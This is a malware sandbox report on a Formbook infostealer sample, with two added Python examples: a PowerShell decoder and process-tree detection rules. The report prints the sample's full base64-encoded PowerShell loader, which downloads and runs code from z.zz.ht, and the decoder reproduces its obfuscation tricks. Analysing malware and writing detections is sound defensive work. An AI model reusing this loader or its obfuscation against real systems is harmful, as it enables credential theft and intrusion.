Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13-07-2020 14:36

General

  • Target

    fdppo.exe

  • Size

    101KB

  • MD5

    082348ffb2977a0762e3e5d6f4a47ff4

  • SHA1

    a63f12bba792fd01307373a7565b96549eb9f3c8

  • SHA256

    8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c

  • SHA512

    ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c

Malware Config

Signatures

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Formbook

    Formbook is a commodity information stealer. It injects into legitimate processes and harvests credentials, keystrokes, clipboard contents and web form data, which it sends to its command-and-control server.

  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Adds Run entry to policy start application 2 TTPs 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies, session tokens and autofill form data.

  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Checks whether UAC is enabled
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SendNotifyMessage
    PID:1336
    • C:\Users\Admin\AppData\Local\Temp\fdppo.exe
      "C:\Users\Admin\AppData\Local\Temp\fdppo.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwB6AC4AegB6AC4AaAB0AC8ATgBlADYANABvAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIANAA4ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABmAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAByAGUAZwAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AegAuAHoAegAuAGgAdAAvAFMAeABUAHAASQAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBF
AFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
        3⤵
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetThreadContext
        • Blacklisted process makes network request
        PID:1608
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: MapViewOfSection
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetThreadContext
          PID:1084
    • C:\Windows\SysWOW64\colorcpl.exe
      "C:\Windows\SysWOW64\colorcpl.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • System policy modification
      • Suspicious behavior: MapViewOfSection
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetThreadContext
      • Adds Run entry to policy start application
      • Drops file in Program Files directory
      PID:1828
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
          PID:1852
        • C:\Program Files\Mozilla Firefox\Firefox.exe
          "C:\Program Files\Mozilla Firefox\Firefox.exe"
          3⤵
            PID:1636
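The powershell.exe command line at level 3 passes its script with `/e` (PowerShell's -EncodedCommand; `-w 1` is WindowStyle Hidden), and the argument is base64 over the UTF-16LE text of the script. Decoding the blob shown above gives a one-liner that sets TLS 1.2, spells a WebClient method name with a format-string reorder (`'{2}{0}{1}{3}' -f 'dSt','rin','`D`o`w`n`l`oa','g'`), instantiates Net.WebClient through a backtick-mangled name, builds `https:` from `'htt'+[Char]80+'s'+[Char]58`, fetches `//z.zz.ht/Ne64o.txt` and `//z.zz.ht/SxTpI.txt`, pipes both responses into IEX, and ends with `[C.M]::R('MSBuild.exe',$f)`, which matches the MSBuild.exe child at level 4. The Python below is an added example, not part of the report or the sample: it reproduces those idioms in a constructed script (placeholder URL example.invalid), encodes it the way -EncodedCommand expects, then decodes and normalizes it to recover method names, assignments and URLs. Run it with the report's blob as the first argument to process the real command line.

```python
import base64
import re
import sys
from typing import Dict, List

# Constructed sample, NOT the blob from the report. It uses the same idioms as
# the report's command once decoded: a '{2}{0}{1}{3}' -f reorder that spells a
# WebClient method name, backticks inside strings (PowerShell ignores them),
# 'htt'+[Char]80+'s'+[Char]58 to avoid a literal "https:", and Unicode smart
# quotes (U+201C/U+201D), which PowerShell accepts as string delimiters.
SAMPLE_SCRIPT = (
    "$reg = ('{2}{0}{1}{3}'-f'dSt','rin',\u201c`D`o`w`n`l`oa\u201d,'g');"
    "$u = 'htt'+[Char]80+'s' + [Char]58 + '//example.invalid/stage2.txt';"
    "(New-Object \u201c`N`e`T`.`W`e`B`C`l`i`e`N`T\u201d).$reg($u)|IEX"
)


def encode_command(script: str) -> str:
    """What powershell.exe -EncodedCommand (-e, -enc, /e) expects:
    base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command. Whitespace is dropped first because report
    pages wrap long blobs across lines; missing '=' padding is restored
    because some loggers truncate it."""
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("utf-16-le")


_SMART_QUOTES = {"\u201c": "'", "\u201d": "'", "\u2018": "'", "\u2019": "'"}
_FORMAT_CALL = re.compile(
    r"\(\s*'((?:\{\d+\})+)'\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)")
_CHAR_CAST = re.compile(r"\[char\]\s*(\d+)", re.I)
_STRING_CONCAT = re.compile(r"'\s*\+\s*'")


def _expand_format(m: "re.Match[str]") -> str:
    """('{1}{0}' -f 'b','a')  ->  'ab'"""
    template = m.group(1)
    args = re.findall(r"'([^']*)'", m.group(2))
    return "'" + re.sub(r"\{(\d+)\}", lambda i: args[int(i.group(1))], template) + "'"


def normalize(script: str) -> str:
    """Undo the string-level obfuscation so names and URLs become readable.
    Caveat: stripping every backtick also destroys real escapes such as `n
    inside double-quoted strings; fine for triage, not for re-execution."""
    for smart, plain in _SMART_QUOTES.items():
        script = script.replace(smart, plain)
    script = script.replace("`", "")
    script = _CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1))) + "'", script)
    script = _STRING_CONCAT.sub("", script)          # 'a'+'b' -> 'ab'
    script = _FORMAT_CALL.sub(_expand_format, script)
    return script


def analyze(blob: str) -> Dict[str, object]:
    """Decode + normalize, then pull out what an analyst wants first."""
    script = normalize(decode_command(blob))
    return {
        "script": script,
        "urls": re.findall(r"https?://[^\s'\"()|;]+", script, re.I),
        "assignments": dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", script)),
    }


if __name__ == "__main__":
    blob = sys.argv[1] if len(sys.argv) > 1 else encode_command(SAMPLE_SCRIPT)
    result = analyze(blob)
    print(result["script"])
    print("urls:", result["urls"])
    print("assignments:", result["assignments"])
```

The normalization is deliberately string-level only: it does not evaluate anything, so a downloaded second stage that the real command feeds through `.Replace(...)` and IEX is left for the analyst to fetch and inspect separately.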

      Network

      MITRE ATT&CK Enterprise v6

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

      • C:\Users\Admin\AppData\Roaming\057903T3\057logim.jpeg

      • C:\Users\Admin\AppData\Roaming\057903T3\057logrf.ini

      • C:\Users\Admin\AppData\Roaming\057903T3\057logri.ini

      • C:\Users\Admin\AppData\Roaming\057903T3\057logrv.ini

      • memory/1084-4-0x000000000041E200-mapping.dmp

      • memory/1084-3-0x0000000000400000-0x000000000042D000-memory.dmp

        Filesize

        180KB

      • memory/1608-0-0x0000000000000000-mapping.dmp

      • memory/1636-20-0x000000013FB80000-0x000000013FC13000-memory.dmp

        Filesize

        588KB

      • memory/1636-19-0x0000000000000000-mapping.dmp

      • memory/1828-18-0x0000000003A30000-0x0000000003B1D000-memory.dmp

        Filesize

        948KB

      • memory/1828-17-0x00000000009A0000-0x0000000000A63000-memory.dmp

        Filesize

        780KB

      • memory/1828-15-0x0000000000A80000-0x0000000000A98000-memory.dmp

        Filesize

        96KB

      • memory/1828-14-0x0000000000000000-mapping.dmp

      • memory/1852-16-0x0000000000000000-mapping.dmp
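The process tree and the Downloads list together record the Formbook chain: an encoded, hidden-window PowerShell launched by the dropper; a bare MSBuild.exe (no project file) spawned by that PowerShell and flagged for WriteProcessMemory, SetThreadContext and MapViewOfSection; colorcpl.exe running under Explorer.EXE with the same injection signatures plus policy and Run-key changes; cmd.exe under colorcpl.exe deleting MSBuild.exe; and a Roaming folder 057903T3 holding 057logim.jpeg and 057logrf/ri/rv.ini. The Python below is an added example, not part of the report or the sandbox: it turns those observations into detection rules run over constructed process-creation events copied from the tree (PIDs, images and command lines as listed; the encoded argument cut short), and checks the Downloads paths against the Roaming naming pattern generalized from the four listed files. That generalization (an 8-character alphanumeric folder whose first three characters prefix `log??.ini` / `log??.jpeg`) is an assumption that the scheme holds beyond this sample.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int        # 0 = parent not present in the log
    image: str
    cmdline: str


# Constructed events reproducing the tree in this report. PIDs, images and
# command lines are copied from it; the encoded PowerShell argument is cut
# short, so these are not the raw sandbox records.
EVENTS: List[Proc] = [
    Proc(1336, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    Proc(1164, 1336, r"C:\Users\Admin\AppData\Local\Temp\fdppo.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\fdppo.exe"'),
    Proc(1608, 1164, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
         r"-ExecutionPolicy bypass -w 1 /e "
         "WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBd"),
    Proc(1084, 1608, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'),
    Proc(1828, 1336, r"C:\Windows\SysWOW64\colorcpl.exe",
         r'"C:\Windows\SysWOW64\colorcpl.exe"'),
    Proc(1852, 1828, r"C:\Windows\SysWOW64\cmd.exe",
         r'/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'),
    Proc(1636, 1828, r"C:\Program Files\Mozilla Firefox\Firefox.exe",
         r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

# Subset of the report's Downloads section (constructed list, paths as listed).
DROPPED_FILES = [
    r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex",
    r"C:\Users\Admin\AppData\Roaming\057903T3\057logim.jpeg",
    r"C:\Users\Admin\AppData\Roaming\057903T3\057logrf.ini",
    r"C:\Users\Admin\AppData\Roaming\057903T3\057logri.ini",
    r"C:\Users\Admin\AppData\Roaming\057903T3\057logrv.ini",
]

# -e / -enc / -EncodedCommand (or the / form) followed by a base64 run.
# "-ExecutionPolicy bypass" does not match: "bypass" is shorter than 20 chars.
ENCODED_PS = re.compile(r"[-/]e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I)
DEL_WINDOWS_BINARY = re.compile(r"/c\s+del\s+\"?[a-z]:\\windows\\", re.I)
SYSTEM_DIR_BINARY = re.compile(r"\\windows\\(?:system32|syswow64)\\[^\\]+$", re.I)
# %APPDATA%\<8 alnum>\<first 3 chars of that folder>log??.(ini|jpeg)
# Assumption: the naming seen in the four Roaming paths above generalizes.
FORMBOOK_DATA_FILE = re.compile(
    r"\\AppData\\Roaming\\(([a-z0-9]{3})[a-z0-9]{5})\\\2log[a-z]{2}\.(?:ini|jpeg)$", re.I)


def _base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def _args_after_image(cmdline: str) -> str:
    """Drop the (possibly quoted) program path; return what follows."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return m.group(1) if m else cmdline


def detect(events: List[Proc]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings in event order."""
    by_pid: Dict[int, Proc] = {p.pid: p for p in events}
    children: Dict[int, List[Proc]] = {}
    for p in events:
        children.setdefault(p.ppid, []).append(p)

    findings: List[Tuple[str, int]] = []
    for p in events:
        name = _base(p.image)
        parent = by_pid.get(p.ppid)
        pname = _base(parent.image) if parent else ""
        if name == "powershell.exe" and ENCODED_PS.search(p.cmdline):
            findings.append(("powershell_encoded_command", p.pid))
        # MSBuild.exe started by PowerShell with no project file: an empty
        # host process, consistent with the injection signatures on PID 1084.
        if name == "msbuild.exe" and pname == "powershell.exe" \
                and not _args_after_image(p.cmdline).strip():
            findings.append(("msbuild_no_project_from_powershell", p.pid))
        if name == "cmd.exe" and DEL_WINDOWS_BINARY.search(p.cmdline):
            findings.append(("cmd_deletes_windows_binary", p.pid))
        # A System32/SysWOW64 binary whose parent is Explorer and which itself
        # spawns cmd.exe: the colorcpl.exe -> cmd.exe step of the tree.
        if pname == "explorer.exe" and SYSTEM_DIR_BINARY.search(p.image) \
                and any(_base(c.image) == "cmd.exe" for c in children.get(p.pid, [])):
            findings.append(("explorer_child_system_binary_spawns_cmd", p.pid))
    return findings


def formbook_data_files(paths: List[str]) -> List[str]:
    return [p for p in paths if FORMBOOK_DATA_FILE.search(p)]


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: PID {pid}")
    for path in formbook_data_files(DROPPED_FILES):
        print(f"formbook_data_file: {path}")
```

The rules key on parent/child relationships and argument shape rather than on hashes or the z.zz.ht host, so they survive a repack of fdppo.exe; the trade-off is that the MSBuild rule will also fire on any script-driven build that launches MSBuild.exe without arguments, so it is a triage signal to pair with the injection telemetry, not a standalone block.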